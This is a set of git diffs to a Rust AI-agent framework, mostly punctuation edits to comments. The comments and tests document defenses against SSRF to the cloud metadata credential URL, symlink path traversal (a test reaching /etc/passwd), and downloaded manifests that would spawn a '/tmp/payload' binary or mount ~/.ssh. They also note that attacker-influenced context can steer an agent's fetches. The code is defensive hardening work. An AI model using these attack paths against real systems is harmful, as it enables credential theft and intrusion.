     fn software_engineer_plan_and_implement_can_ask_the_user_dynamically() {
         // Beyond the static plan_approval checkpoint, plan/implement should
         // be able to decide for themselves, mid-reasoning, that they need
-        // human input — via the ask_user_* tools, not just the forced
+        // human input - via the ask_user_* tools, not just the forced
         // interaction_points.
         let manifest_content = include_str!("../../../agents/software-engineer/agent.leviath");
         let bp = parse_manifest(manifest_content).unwrap();
@@ -3232,7 +3232,7 @@ mode = "autonomous"
 
     // ─── Production-code branch coverage: optional field None-paths ──────────
 
-    /// `interactive_points` mode with NO `interaction_points` array — the stage
+    /// `interactive_points` mode with NO `interaction_points` array - the stage
     /// still gets the mode, just with an empty points list.
     #[test]
     fn parse_manifest_interactive_points_mode_with_no_points_array() {
@@ -3249,7 +3249,7 @@ mode = "interactive_points"
         assert!(points.is_empty());
     }
 
-    /// Per-stage tool_permissions with a non-string policy value — the inner
+    /// Per-stage tool_permissions with a non-string policy value - the inner
     /// `if let Some(policy_str) = policy_val.as_str()` should be skipped.
     #[test]
     fn parse_manifest_stage_tool_permissions_non_string_value_skipped() {
@@ -3269,7 +3269,7 @@ bash = 123
         assert!(stage.tool_permissions.is_empty());
     }
 
-    /// Compaction config without `provider` — covers the None-branch at line ~460.
+    /// Compaction config without `provider` - covers the None-branch at line ~460.
     #[test]
     fn parse_manifest_compaction_without_provider_uses_default() {
         let toml = r#"
@@ -3281,11 +3281,11 @@ model = "gpt-4o-mini"
 "#;
         let bp = parse_manifest(toml).unwrap();
         let cc = bp.compaction_config.as_ref().unwrap();
-        // provider absent — stays at CompactionConfig default
+        // provider absent - stays at CompactionConfig default
         assert_eq!(cc.model, "gpt-4o-mini");
     }
 
-    /// Compaction config without `model` — covers the None-branch at line ~463.
+    /// Compaction config without `model` - covers the None-branch at line ~463.
     #[test]
     fn parse_manifest_compaction_without_model_uses_default() {
         let toml = r#"
@@ -3298,7 +3298,7 @@ provider = "anthropic"
         let bp = parse_manifest(toml).unwrap();
         let cc = bp.compaction_config.as_ref().unwrap();
         assert_eq!(cc.provider, "anthropic");
-        // model absent — stays at CompactionConfig default
+        // model absent - stays at CompactionConfig default
     }
 
     // ─── Security config parsing ──────────────────────────────────────────
@@ -3341,7 +3341,7 @@ name = "no-security"
         assert!(bp.security.is_none());
     }
 
-    /// Agent-level tool_permissions with a non-string value — the inner
+    /// Agent-level tool_permissions with a non-string value - the inner
     /// `if let Some(policy_str) = policy_val.as_str()` should be skipped.
     #[test]
     fn parse_manifest_agent_tool_permissions_non_string_value_skipped() {

--- a/crates/leviath-core/src/manifest.rs
+++ b/crates/leviath-core/src/manifest.rs
@@ -3034,8 +3034,8 @@ mode = "autonomous"
         assert!(plan.max_revisits.is_some());
     }
 
-    /// Issue #107: an implement stage that can leave without having written
-    /// anything is how a run ends up with no output at all. Every edge out of
+    /// An implement stage that can leave without having written anything is
+    /// how a run ends up with no output at all. Every edge out of
     /// `implement` that the AGENT can choose must carry a `require_modifications`
     /// gate, and the write tools must be routed into the region that gate points
     /// at (which is also what the reviewer is told to read).
@@ -3044,7 +3044,7 @@ mode = "autonomous"
     /// gate answers "did you do any work before leaving?", which only makes sense
     /// for a voluntary exit. Gating an escape hatch would send a failed or
     /// looping agent back into the stage it is failing in - a stuck agent is not
-    /// helped by being told to write more (issue #106).
+    /// helped by being told to write more.
     #[test]
     fn shipped_coding_agents_gate_every_non_error_implement_edge() {
         for manifest_content in [

--- a/crates/leviath-core/src/net.rs
+++ b/crates/leviath-core/src/net.rs
@@ -481,9 +481,9 @@ mod tests {
     }
 
     /// Asserting on `PrivateAddress` specifically, not just `is_err()`: an IPv6
-    /// literal used to be refused as *unresolvable* (the brackets from
-    /// `host_str()` parsed as neither an address nor a name), which passed an
-    /// `is_err()` check while the address rules never ran at all.
+    /// literal refused as *unresolvable* (the brackets from `host_str()`
+    /// parsing as neither an address nor a name) would pass an `is_err()` check
+    /// while the address rules never ran at all.
     #[test]
     fn rejects_loopback_and_private_literals() {
         for s in [

--- a/crates/leviath-core/src/net.rs
+++ b/crates/leviath-core/src/net.rs
@@ -1,7 +1,7 @@
 //! Outbound-request policy: which URLs an agent-driven fetch may reach.
 //!
 //! Agents fetch URLs the model chose, and the model chose them from context an
-//! attacker can influence — search results, a page fetched a moment ago, a task
+//! attacker can influence - search results, a page fetched a moment ago, a task
 //! description pasted from an issue. Handing such a URL straight to an HTTP
 //! client turns the agent into a confused deputy sitting *inside* the user's
 //! network: `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
@@ -16,7 +16,7 @@
 //!
 //! A hostname is resolved here and then resolved *again* by the HTTP client when
 //! it connects. A DNS entry with a very short TTL that answers publicly the first
-//! time and privately the second slips through that window — classic DNS
+//! time and privately the second slips through that window - classic DNS
 //! rebinding. Closing it needs a custom connector that dials the exact address
 //! this module approved, which the shared blocking client cannot express today.
 //! The check still stops every direct attempt (literal IPs, hostnames that
@@ -34,7 +34,7 @@ use std::time::Duration;
 /// registry. `Client::new()` is an easy default to reach for and a bad one for
 /// anything talking to a host we do not control.
 ///
-/// Values are deliberately generous — this is a floor to stop a hang, not a
+/// Values are deliberately generous - this is a floor to stop a hang, not a
 /// performance budget. A caller with a real reason for different numbers builds
 /// its own client and says why, as the provider and MCP transports do.
 #[derive(Debug, Clone, Copy)]
@@ -85,7 +85,7 @@ pub fn client(timeouts: ClientTimeouts) -> reqwest::Client {
 /// A hop is a destination the caller's original check never saw: a perfectly
 /// public endpoint answering `307 Location: http://169.254.169.254/…` lands on
 /// the cloud metadata service just the same, and 307/308 preserve the method
-/// *and the body*. Capping the hop count does not help — the first hop is
+/// *and the body*. Capping the hop count does not help - the first hop is
 /// already somewhere else.
 ///
 /// Use this wherever the URL came from outside: a model, a request body, a
@@ -142,7 +142,7 @@ impl UrlRejection {
     /// A stable short name for this refusal.
     ///
     /// Exists so a test can `assert_eq!(err.kind(), "private_address")` rather
-    /// than `assert!(matches!(err, ...))` — the `matches!` non-matching arm is a
+    /// than `assert!(matches!(err, ...))` - the `matches!` non-matching arm is a
     /// region only a *failing* assertion ever reaches, which reads as uncovered
     /// under the workspace's 100% gate. Useful in its own right for structured
     /// logging, where the kind is the field worth indexing on.
@@ -161,14 +161,14 @@ impl std::fmt::Display for UrlRejection {
         match self {
             Self::Scheme(s) => write!(
                 f,
-                "scheme '{s}' is not fetchable — only http and https are allowed"
+                "scheme '{s}' is not fetchable - only http and https are allowed"
             ),
             Self::Unresolvable(h) => write!(f, "host '{h}' did not resolve"),
             Self::PrivateAddress { host, addr } => write!(
                 f,
                 "'{host}' resolves to {addr}, which is on a loopback, private, or \
                  link-local network. Fetching it from an agent would reach the \
-                 user's own machine or LAN — including cloud metadata services \
+                 user's own machine or LAN - including cloud metadata services \
                  that hand out credentials. Set `[security] allow_local_network = \
                  true` if this agent is genuinely meant to talk to a local service."
             ),
@@ -181,7 +181,7 @@ impl std::fmt::Display for UrlRejection {
 ///
 /// Covers loopback, RFC 1918 private, link-local (which includes the
 /// `169.254.169.254` cloud metadata endpoint), CGNAT, unspecified, multicast,
-/// broadcast, and documentation ranges — plus the IPv6 equivalents. IPv4-mapped
+/// broadcast, and documentation ranges - plus the IPv6 equivalents. IPv4-mapped
 /// IPv6 addresses are unwrapped first, so `::ffff:127.0.0.1` cannot be used to
 /// smuggle a loopback address past a v6 check.
 pub fn is_restricted_addr(addr: IpAddr) -> bool {
@@ -205,12 +205,12 @@ fn is_restricted_v4(a: Ipv4Addr) -> bool {
         || a.is_multicast()
         || a.is_broadcast()
         || a.is_documentation()
-        // 100.64.0.0/10 — carrier-grade NAT. `Ipv4Addr::is_shared` is still
+        // 100.64.0.0/10 - carrier-grade NAT. `Ipv4Addr::is_shared` is still
         // unstable, so the range is spelled out.
         || (b0 == 100 && (64..128).contains(&b1))
-        // 192.0.0.0/24 — IETF protocol assignments.
+        // 192.0.0.0/24 - IETF protocol assignments.
         || (b0 == 192 && b1 == 0 && a.octets()[2] == 0)
-        // 240.0.0.0/4 — reserved.
+        // 240.0.0.0/4 - reserved.
         || b0 >= 240
 }
 
@@ -219,9 +219,9 @@ fn is_restricted_v6(a: Ipv6Addr) -> bool {
     a.is_loopback()
         || a.is_unspecified()
         || a.is_multicast()
-        // fc00::/7 — unique local. `is_unique_local` is unstable.
+        // fc00::/7 - unique local. `is_unique_local` is unstable.
         || (seg0 & 0xfe00) == 0xfc00
-        // fe80::/10 — link-local unicast. `is_unicast_link_local` is unstable.
+        // fe80::/10 - link-local unicast. `is_unicast_link_local` is unstable.
         || (seg0 & 0xffc0) == 0xfe80
 }
 
@@ -249,7 +249,7 @@ fn resolve_host(host: &str, port: u16) -> Option<Vec<IpAddr>> {
 
 /// Core of [`check_url`] with name resolution injected.
 ///
-/// A `fn` pointer, not `impl Fn`, so there is a single monomorphization —
+/// A `fn` pointer, not `impl Fn`, so there is a single monomorphization -
 /// otherwise each caller's closure type gets its own coverage report and every
 /// arm reads as partially covered. The seam exists because the interesting cases
 /// (a name resolving to nothing, a name resolving to a public address, a name
@@ -269,11 +269,11 @@ pub(crate) fn check_url_with(
     }
     // `url::Host`, not `host_str()`: the latter keeps the brackets on an IPv6
     // literal (`[::1]`), which then fails to parse as an address *and* fails to
-    // resolve — refusing the URL, but as "unresolvable" rather than "loopback",
+    // resolve - refusing the URL, but as "unresolvable" rather than "loopback",
     // and only by accident. `Host` hands back the address already parsed.
     // `.expect`, not a `NoHost` variant: the scheme check above has already
     // restricted us to http/https, and the URL Standard requires a host for
-    // those "special" schemes — `Url::parse("http://")` fails with "empty host"
+    // those "special" schemes - `Url::parse("http://")` fails with "empty host"
     // rather than producing a hostless URL. A branch for the impossible case
     // would be a permanently-uncovered one.
     let host = url
@@ -299,8 +299,8 @@ pub(crate) fn check_url_with(
 
     let host = host_str.as_str();
     let port = url.port_or_known_default().unwrap_or(80);
-    // A resolver error and an empty answer are the same thing to a caller —
-    // there is no address to check — so they collapse to one branch rather than
+    // A resolver error and an empty answer are the same thing to a caller -
+    // there is no address to check - so they collapse to one branch rather than
     // two, one of which would be near-impossible to reach.
     let resolved = resolve(host, port).filter(|addrs: &Vec<IpAddr>| !addrs.is_empty());
     let Some(resolved) = resolved else {
@@ -369,7 +369,7 @@ mod tests {
         let addr = redirecting_server("http://169.254.169.254/latest/".to_string(), 1).await;
 
         // The policy only sees *redirects*, never the URL the caller passed, so
-        // the initial connect to loopback proceeds regardless of this flag —
+        // the initial connect to loopback proceeds regardless of this flag -
         // what it governs is whether the hop onward to link-local is followed.
         let client = checked_client(ClientTimeouts::default(), false);
         let err = client
@@ -390,7 +390,7 @@ mod tests {
         assert!(refused, "{chain}");
     }
 
-    /// And a permitted hop is actually followed — so the policy is deciding per
+    /// And a permitted hop is actually followed - so the policy is deciding per
     /// address rather than refusing every redirect.
     #[tokio::test(flavor = "multi_thread")]
     async fn checked_client_follows_a_permitted_redirect() {
@@ -410,7 +410,7 @@ mod tests {
     /// A hop is a destination the caller's original check never saw. 307/308
     /// preserve the method *and* the body, so a public endpoint answering with a
     /// redirect to a private address turns a webhook into a request primitive
-    /// against the internal network — capping the hop count does not help,
+    /// against the internal network - capping the hop count does not help,
     /// because the first hop is already somewhere else.
     #[test]
     fn a_redirect_hop_is_checked_like_any_other_url() {
@@ -449,7 +449,7 @@ mod tests {
         );
     }
 
-    /// The builder has to actually produce a client — a factory returning a
+    /// The builder has to actually produce a client - a factory returning a
     /// builder nothing can `build()` would be a silent no-op.
     #[test]
     fn the_client_builder_produces_a_usable_client() {
@@ -597,7 +597,7 @@ mod tests {
     }
 
     /// The scheme check runs before resolution, so a refused scheme never
-    /// reaches the resolver — no DNS lookup for a URL we were never going to
+    /// reaches the resolver - no DNS lookup for a URL we were never going to
     /// fetch.
     #[test]
     fn the_scheme_is_checked_before_anything_is_resolved() {

--- a/crates/leviath-core/src/paths.rs
+++ b/crates/leviath-core/src/paths.rs
@@ -7,7 +7,7 @@ use std::path::{Path, PathBuf};
 /// `dirs::home_dir()` cannot be redirected by `$HOME` on macOS
 /// (`NSHomeDirectory()`) or `%USERPROFILE%` on Windows
 /// (`SHGetKnownFolderPath`), so `LEVIATH_HOME` is the single override every
-/// home-relative path honors — which is what lets a test (including one that
+/// home-relative path honors - which is what lets a test (including one that
 /// spawns the real `lev` binary) redirect all of them at once.
 ///
 /// `None` when neither resolves; callers decide how to report that rather than
@@ -21,7 +21,7 @@ pub fn home_dir() -> Option<PathBuf> {
 
 /// Leviath's data root: `<home>/.leviath`.
 ///
-/// Every persistent thing Leviath owns lives under here — `config.toml`,
+/// Every persistent thing Leviath owns lives under here - `config.toml`,
 /// `mcp-auth.json`, `runs/`, `agents/`, `providers/`, `tools/`, the control
 /// socket. Having one function say so is the point: there were seven separate
 /// resolvers with **three incompatible readings of `LEVIATH_HOME`**, so with the
@@ -34,7 +34,7 @@ pub fn data_dir() -> Option<PathBuf> {
 
 /// The directory scanned for global drop-in Rhai *tool* scripts.
 ///
-/// `<home>/.leviath/tools`, alongside `providers/` and `agents/` — not
+/// `<home>/.leviath/tools`, alongside `providers/` and `agents/` - not
 /// `<home>/tools`, which is where three call sites landed by joining `"tools"`
 /// onto the *user home* rather than the data root. That mattered: every `.rhai`
 /// file found here is compiled and offered to **every** agent as an executable
@@ -57,8 +57,8 @@ pub fn agents_dir() -> Option<PathBuf> {
 /// Whether `name` is safe to use as a single path component.
 ///
 /// Accepts `[A-Za-z0-9._-]+` and nothing else. Everything a caller supplies as
-/// "the name of a thing" — a blueprint name from a REST body, a run id from a
-/// URL segment — must pass this before it is `join`ed onto a directory, because
+/// "the name of a thing" - a blueprint name from a REST body, a run id from a
+/// URL segment - must pass this before it is `join`ed onto a directory, because
 /// `Path::join` does not normalize and does not resist an absolute path:
 ///
 /// ```text
@@ -88,7 +88,7 @@ pub fn is_safe_path_component(name: &str) -> bool {
 /// `/` satisfies it while pointing anywhere on the filesystem. Every file tool
 /// in Leviath was relying on exactly that check.
 ///
-/// `path` need not exist — a `write_file` creating a new file is the common
+/// `path` need not exist - a `write_file` creating a new file is the common
 /// case. The deepest *existing* ancestor is canonicalized (which is where any
 /// symlink lives) and the unresolved tail re-appended, so a not-yet-created file
 /// under a symlinked parent is still caught.
@@ -97,7 +97,7 @@ pub fn is_safe_path_component(name: &str) -> bool {
 /// symlink to `/private/tmp`, so a root that was stored uncanonicalized would
 /// never prefix-match a canonicalized path and every access would be refused.
 ///
-/// This is not TOCTOU-proof — a symlink planted between this call and the
+/// This is not TOCTOU-proof - a symlink planted between this call and the
 /// subsequent `open` still wins. Closing that needs `openat`/`O_NOFOLLOW`
 /// throughout. This stops the planted-symlink case, which is the one an agent
 /// can arrange for itself.
@@ -146,7 +146,7 @@ mod tests {
 
     /// Everything Leviath persists sits under one root, and `LEVIATH_HOME`
     /// moves all of it together. Seven separate resolvers with three readings of
-    /// that variable is what this replaced — and the consequence was concrete: a
+    /// that variable is what this replaced - and the consequence was concrete: a
     /// run that believed it was isolated wrote to the real
     /// `~/.leviath/config.toml`.
     #[test]
@@ -241,7 +241,7 @@ mod tests {
         let link = root.join("link");
         std::os::unix::fs::symlink("/", &link).unwrap();
 
-        // Lexically this is impeccable — and that was the whole problem.
+        // Lexically this is impeccable - and that was the whole problem.
         let target = link.join("etc/passwd");
         assert!(
             target.starts_with(root),
@@ -250,7 +250,7 @@ mod tests {
         assert!(!resolves_within(&target, root));
     }
 
-    /// A symlink whose target is *inside* the root is fine — the check is about
+    /// A symlink whose target is *inside* the root is fine - the check is about
     /// where the path lands, not whether a symlink was involved.
     #[cfg(unix)]
     #[test]
@@ -276,7 +276,7 @@ mod tests {
     }
 
     /// macOS puts temp dirs under a symlinked `/tmp`, so an uncanonicalized root
-    /// must still work — canonicalizing only the path and not the root would
+    /// must still work - canonicalizing only the path and not the root would
     /// refuse every access on that platform.
     #[test]
     fn an_uncanonicalized_root_still_matches() {

--- a/crates/leviath-core/src/paths.rs
+++ b/crates/leviath-core/src/paths.rs
@@ -171,10 +171,9 @@ mod tests {
             let home = home_dir().expect("a home directory resolves");
             let data = data_dir().expect("so does the data dir");
             assert_eq!(data, home.join(".leviath"));
-            // The global tool-scan directory in particular: this resolved to
-            // `$HOME/tools` before, outside Leviath's own directory entirely,
-            // and every `.rhai` file there becomes an executable tool for every
-            // agent.
+            // The global tool-scan directory in particular must sit inside
+            // Leviath's own directory, never a bare `$HOME/tools`: every
+            // `.rhai` file there becomes an executable tool for every agent.
             assert_eq!(tools_dir(), Some(data.join("tools")));
             assert!(tools_dir().expect("set").ends_with(".leviath/tools"));
         });

--- a/crates/leviath-core/src/policy.rs
+++ b/crates/leviath-core/src/policy.rs
@@ -442,7 +442,7 @@ send_email = { sensitivity = "private", direction = "egress", clearance = "publi
     #[test]
     fn test_from_toml_mcp_override_server_without_tools_table() {
         // A server entry that has no `tools` sub-table exercises the
-        // `if let Some(tools_table)` None branch — nothing is inserted.
+        // `if let Some(tools_table)` None branch - nothing is inserted.
         let toml = r#"
 [mcp_overrides.emptyserver]
 note = "no tools declared here"

--- a/crates/leviath-core/src/region.rs
+++ b/crates/leviath-core/src/region.rs
@@ -76,7 +76,7 @@ pub enum EvictionStrategy {
 pub enum RegionKind {
     /// Never evicted or compacted. Architecture diagrams, constraints, identity.
     ///
-    /// Like SNES OAM (Object Attribute Memory) — fixed format, always present.
+    /// Like SNES OAM (Object Attribute Memory) - fixed format, always present.
     /// Use for content that defines the agent's core identity, constraints,
     /// and architectural understanding. This content persists for the entire
     /// agent lifecycle.
@@ -1210,7 +1210,7 @@ mod tests {
         assert_eq!(schema.custom_script.as_deref(), Some("validate_special()"));
     }
 
-    // ─── RegionSchema::validate — every ContentFormat branch ───────────────
+    // ─── RegionSchema::validate - every ContentFormat branch ───────────────
 
     #[test]
     fn test_validate_json_valid() {
@@ -1298,7 +1298,7 @@ mod tests {
         let schema = RegionSchema::new(ContentFormat::Custom {
             format_name: "special".to_string(),
         });
-        // Custom format validation is deferred to the scripting layer —
+        // Custom format validation is deferred to the scripting layer -
         // this schema's own validate() is a no-op for it.
         assert!(schema.validate("").is_ok());
         assert!(schema.validate("whatever").is_ok());
@@ -2042,7 +2042,7 @@ mod tests {
             region.add_entry(format!("msg{}", i), 10).unwrap();
         }
         assert!(region.needs_message_compaction);
-        // No entries were evicted — compaction flag is set for the runtime
+        // No entries were evicted - compaction flag is set for the runtime
         assert_eq!(region.entry_count(), 9);
     }
 
@@ -2809,7 +2809,7 @@ mod tests {
     #[test]
     fn test_evict_lru_entry_on_empty_region_is_noop() {
         // Directly exercise the early-return guard in `evict_lru_entry` when
-        // there is nothing to evict — a defensive branch not reachable through
+        // there is nothing to evict - a defensive branch not reachable through
         // the public upsert path (which only evicts non-empty regions).
         let mut region = Region::new(
             "kv".to_string(),

--- a/crates/leviath-core/src/run_archive.rs
+++ b/crates/leviath-core/src/run_archive.rs
@@ -1,9 +1,9 @@
 //! A portable, self-contained record of an entire agent run.
 //!
 //! A run archive is a single append-only file that captures everything about a
-//! run — who owns it (which machine, which world/daemon instance), its metadata,
+//! run - who owns it (which machine, which world/daemon instance), its metadata,
 //! every inference and tool batch, inbound messages, and the evolving context
-//! window — with enough fidelity that copying the file to another machine lets a
+//! window - with enough fidelity that copying the file to another machine lets a
 //! daemon **continue the run where it left off** (LLM non-determinism aside) or
 //! replay it for debugging.
 //!
@@ -23,7 +23,7 @@
 //! [`RunIdentity`] records which machine + world/daemon instance owns a run, and
 //! [`RunRecord::OwnershipChanged`] records a handoff. This is deliberately more
 //! than today needs: the format is meant to eventually let a run start on one
-//! machine, pause, and resume on another — including a machine declining a run
+//! machine, pause, and resume on another - including a machine declining a run
 //! whose tools it lacks and waiting for a capable host. That scheduling logic
 //! isn't built yet; the format simply reserves room for it (ownership handoffs
 //! are first-class, the version field gates changes, and new record variants can
@@ -54,7 +54,7 @@ pub const RUN_ARCHIVE_VERSION: u16 = 1;
 ///
 /// `machine_id` + `world_id` make a run unambiguously attributable even when
 /// several daemons share a filesystem and might otherwise pick the same
-/// `run_id` — a daemon can read a run's owner before deciding whether to resume
+/// `run_id` - a daemon can read a run's owner before deciding whether to resume
 /// or leave it alone.
 #[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
 pub struct RunIdentity {
@@ -90,7 +90,7 @@ pub struct ToolCallRecord {
     pub result: Option<String>,
 }
 
-/// The outbound request of one inference (a provider-agnostic digest — enough to
+/// The outbound request of one inference (a provider-agnostic digest - enough to
 /// reproduce/debug the call without depending on `leviath-providers`).
 #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 pub struct InferenceRequestRecord {
@@ -129,7 +129,7 @@ pub struct InferenceResponseRecord {
 #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 pub enum RegionDelta {
     /// A new region, or a region whose kind/max changed or whose entries were
-    /// rewritten in a non-append way — carried in full.
+    /// rewritten in a non-append way - carried in full.
     Set(RegionSnapshot),
     /// Entries appended to an existing region (the common between-inference
     /// case). The region's kind/max are unchanged.
@@ -245,7 +245,7 @@ pub enum RunRecord {
     },
     /// A step forward: the updated metadata plus a *diff* of the context window
     /// since the previous point. This is the compact per-tick record the writer
-    /// emits between full checkpoints — meta is small, and the context (the bulk)
+    /// emits between full checkpoints - meta is small, and the context (the bulk)
     /// is carried as a [`ContextDelta`] rather than a full snapshot.
     Progress {
         /// The run metadata as of this step.
@@ -274,7 +274,7 @@ pub fn diff_context(prev: &ContextSnapshot, next: &ContextSnapshot) -> ContextDe
             None => regions.push(RegionDelta::Set(nr.clone())),
             Some(pr) => {
                 if pr == nr {
-                    // unchanged — emit nothing
+                    // unchanged - emit nothing
                 } else if nr.entries.is_empty() && !pr.entries.is_empty() {
                     regions.push(RegionDelta::Clear {
                         name: nr.name.clone(),
@@ -437,7 +437,7 @@ pub fn read_archive(r: &mut dyn Read) -> io::Result<(u16, Vec<RunRecord>)> {
 ///
 /// A crash while the persistence lane is appending a record can leave a partial
 /// final frame (a truncated length prefix or payload). The strict [`read_archive`]
-/// would reject the whole file for that torn tail — and once a fallback-resume
+/// would reject the whole file for that torn tail - and once a fallback-resume
 /// appends fresh records *past* the torn bytes, the archive would stay unreadable
 /// forever. This variant instead stops at the torn tail and keeps everything valid
 /// before it, so recovery can still fold the archive to its last intact point. The
@@ -456,7 +456,7 @@ pub fn read_archive_lenient(r: &mut dyn Read) -> io::Result<(u16, Vec<RunRecord>
 
 // ─── fold ───────────────────────────────────────────────────────────────────
 
-/// The state reconstructed from a run journal — enough to resume or inspect the
+/// The state reconstructed from a run journal - enough to resume or inspect the
 /// run at its latest recorded point.
 #[derive(Debug, Clone, PartialEq)]
 pub struct FoldedRun {
@@ -675,7 +675,7 @@ mod tests {
         }
     }
 
-    /// A stable tag per region-delta shape — asserting on this avoids the
+    /// A stable tag per region-delta shape - asserting on this avoids the
     /// uncovered `false` arm a `matches!` leaves when the assertion passes.
     /// Every arm is exercised across the diff tests below.
     fn region_delta_kind(d: &RegionDelta) -> &'static str {

--- a/crates/leviath-core/src/run_meta.rs
+++ b/crates/leviath-core/src/run_meta.rs
@@ -19,7 +19,7 @@ pub enum RunStatus {
     WaitingInput,
     Complete,
     /// All required stages done; agent still accepts optional follow-up input.
-    /// Shown as "Complete" in the dashboard — no kill option, input still enabled.
+    /// Shown as "Complete" in the dashboard - no kill option, input still enabled.
     CompleteInteractive,
     Error,
     Cancelled,
@@ -86,7 +86,7 @@ pub struct RunMeta {
     /// (`X-Leviath-Signature` header) so the receiver can verify authenticity.
     ///
     /// Persisted, because the daemon must still be able to sign a webhook for a
-    /// run it reloaded after a restart. **Never serve it** — strip it with
+    /// run it reloaded after a restart. **Never serve it** - strip it with
     /// [`RunMeta::redacted`] before any of this struct leaves the process. See
     /// that method for what went wrong.
     #[serde(default)]
@@ -107,7 +107,7 @@ pub struct RunMeta {
     /// (0 when it has none). Restores `SubAgentChildren::max_child_depth`.
     #[serde(default)]
     pub max_child_depth: usize,
-    /// Why this run may have produced nothing useful — see [`RunFlags`].
+    /// Why this run may have produced nothing useful - see [`RunFlags`].
     #[serde(default)]
     pub flags: RunFlags,
 }
@@ -165,7 +165,7 @@ impl RunMeta {
     ///
     /// `GET /api/agents`, `/api/agents/{id}` and `/api/agents/{id}/children` all
     /// serialized `RunMeta` whole, so any holder of the API token could read
-    /// every run's `callback_secret` — the key that authenticates Leviath's
+    /// every run's `callback_secret` - the key that authenticates Leviath's
     /// webhooks to their receivers. Mirrors the `RedactedConfig` pattern the
     /// `/api/config` handler already uses correctly.
     ///
@@ -249,7 +249,7 @@ pub struct RegionEntrySnapshot {
     /// been blocked a moment earlier. Any restart, crash-recovery, `resume`, or
     /// page-in did it.
     ///
-    /// Defaults to `Public` for snapshots written before this field existed —
+    /// Defaults to `Public` for snapshots written before this field existed -
     /// the same value they were being restored with anyway, so nothing is worse
     /// than it was, and new runs are correct from their first write.
     #[serde(default)]
@@ -357,7 +357,7 @@ mod tests {
     }
 
     /// The webhook signing secret must not survive into anything served over
-    /// the API — `GET /api/agents` used to hand it to any token holder.
+    /// the API - `GET /api/agents` used to hand it to any token holder.
     #[test]
     fn redacted_drops_the_callback_secret_and_keeps_everything_else() {
         let mut m = sample_meta();
@@ -372,7 +372,7 @@ mod tests {
         assert_eq!(r.run_id, m.run_id);
         assert_eq!(r.task, m.task);
 
-        // Serializing the redacted form must not mention it at all — a `None`
+        // Serializing the redacted form must not mention it at all - a `None`
         // that still emitted `"callback_secret": null` would be fine, but an
         // assertion on the wire format is what a reviewer actually checks.
         let json = serde_json::to_string(&r).unwrap();

--- a/crates/leviath-core/src/run_meta.rs
+++ b/crates/leviath-core/src/run_meta.rs
@@ -116,8 +116,9 @@ pub struct RunMeta {
 /// harness (or the dashboard) can tell an empty run from a successful one
 /// without inspecting the workspace or parsing logs.
 ///
-/// Issue #107: 13/300 SWE-bench runs completed their whole stage pipeline and
-/// produced no file changes at all. Nothing on disk said so, or said why.
+/// The motivating failure: 13/300 SWE-bench runs completed their whole stage
+/// pipeline and produced no file changes at all. Nothing on disk said so, or
+/// said why.
 #[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq)]
 pub struct RunFlags {
     /// Paths passed to file-modifying tools that succeeded, in first-touch
@@ -357,7 +358,8 @@ mod tests {
     }
 
     /// The webhook signing secret must not survive into anything served over
-    /// the API - `GET /api/agents` used to hand it to any token holder.
+    /// the API - an unredacted meta lets `GET /api/agents` hand it to any
+    /// token holder.
     #[test]
     fn redacted_drops_the_callback_secret_and_keeps_everything_else() {
         let mut m = sample_meta();

--- a/crates/leviath-core/src/sandbox.rs
+++ b/crates/leviath-core/src/sandbox.rs
@@ -513,8 +513,9 @@ mod tests {
     }
 
     /// A downloaded manifest cannot drop the user back onto the host. Both the
-    /// agent and stage levels come from `agent.leviath`, so `kind = "none"`
-    /// there was previously enough to defeat a global `kind = "container"`.
+    /// agent and stage levels come from `agent.leviath`, so if those levels
+    /// could win, `kind = "none"` there would defeat a global
+    /// `kind = "container"`.
     #[test]
     fn manifest_cannot_disable_the_users_sandbox() {
         let global = ToolSandboxConfig {

--- a/crates/leviath-core/src/sandbox.rs
+++ b/crates/leviath-core/src/sandbox.rs
@@ -1,6 +1,6 @@
 //! Sandboxed tool-execution configuration.
 //!
-//! Describes *where* an agent's shell/command tools run — directly on the host
+//! Describes *where* an agent's shell/command tools run - directly on the host
 //! ([`SandboxKind::None`], the default), inside a fresh set of Linux namespaces
 //! ([`SandboxKind::Namespace`], via `unshare(1)`), or inside a container
 //! ([`SandboxKind::Container`], via Docker/Podman). Only shell command execution
@@ -18,7 +18,7 @@ use serde::{Deserialize, Serialize};
 #[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
 #[serde(rename_all = "lowercase")]
 pub enum SandboxKind {
-    /// Run directly on the host — current behavior, explicit opt-out.
+    /// Run directly on the host - current behavior, explicit opt-out.
     #[default]
     None,
     /// Run under fresh Linux namespaces via `unshare(1)` (Linux only).
@@ -53,7 +53,7 @@ pub struct ToolSandboxConfig {
     pub image: Option<String>,
     /// Container engine binary to use (e.g. `"docker"`, `"podman"`, `"nerdctl"`,
     /// `"finch"`). `None` auto-detects (Docker, then Podman). Leviath isn't
-    /// prescriptive — any Docker-CLI-compatible binary works. Container kind only.
+    /// prescriptive - any Docker-CLI-compatible binary works. Container kind only.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub engine: Option<String>,
     /// Whether the sandbox has network access. `false` isolates the network.
@@ -99,7 +99,7 @@ fn stronger_of(a: SandboxKind, b: SandboxKind) -> SandboxKind {
 
 impl Default for ToolSandboxConfig {
     fn default() -> Self {
-        // A present `[sandbox]` block with no `kind` means "host" (no-op) — unlike
+        // A present `[sandbox]` block with no `kind` means "host" (no-op) - unlike
         // `SecurityConfig`, an empty block is not "turn everything on". Callers
         // still cascade through `resolve_sandbox` so "no block" inherits the global
         // default (also host).
@@ -123,8 +123,8 @@ impl ToolSandboxConfig {
 
     /// This config with any manifest-chosen `engine` removed.
     ///
-    /// `engine` is spawned as argv[0] on the **host** when the sandbox is built
-    /// — before the first inference, and so before any tool-approval prompt.
+    /// `engine` is spawned as argv[0] on the **host** when the sandbox is built -
+    /// before the first inference, and so before any tool-approval prompt.
     /// A downloaded `agent.leviath` naming `engine = "/tmp/payload"` therefore
     /// executed it, and clamping only against a user who had *pinned* an engine
     /// missed the ordinary case: auto-detection is the default, so the ceiling
@@ -156,7 +156,7 @@ impl ToolSandboxConfig {
     /// ```
     ///
     /// silently discarded a user's `network = false` and bind-mounted their home
-    /// directory — including `~/.ssh` and `~/.leviath` — into a container whose
+    /// directory - including `~/.ssh` and `~/.leviath` - into a container whose
     /// shell runs as root. It satisfied "still sandboxed" while handing over
     /// more than running unsandboxed would have made obvious.
     ///
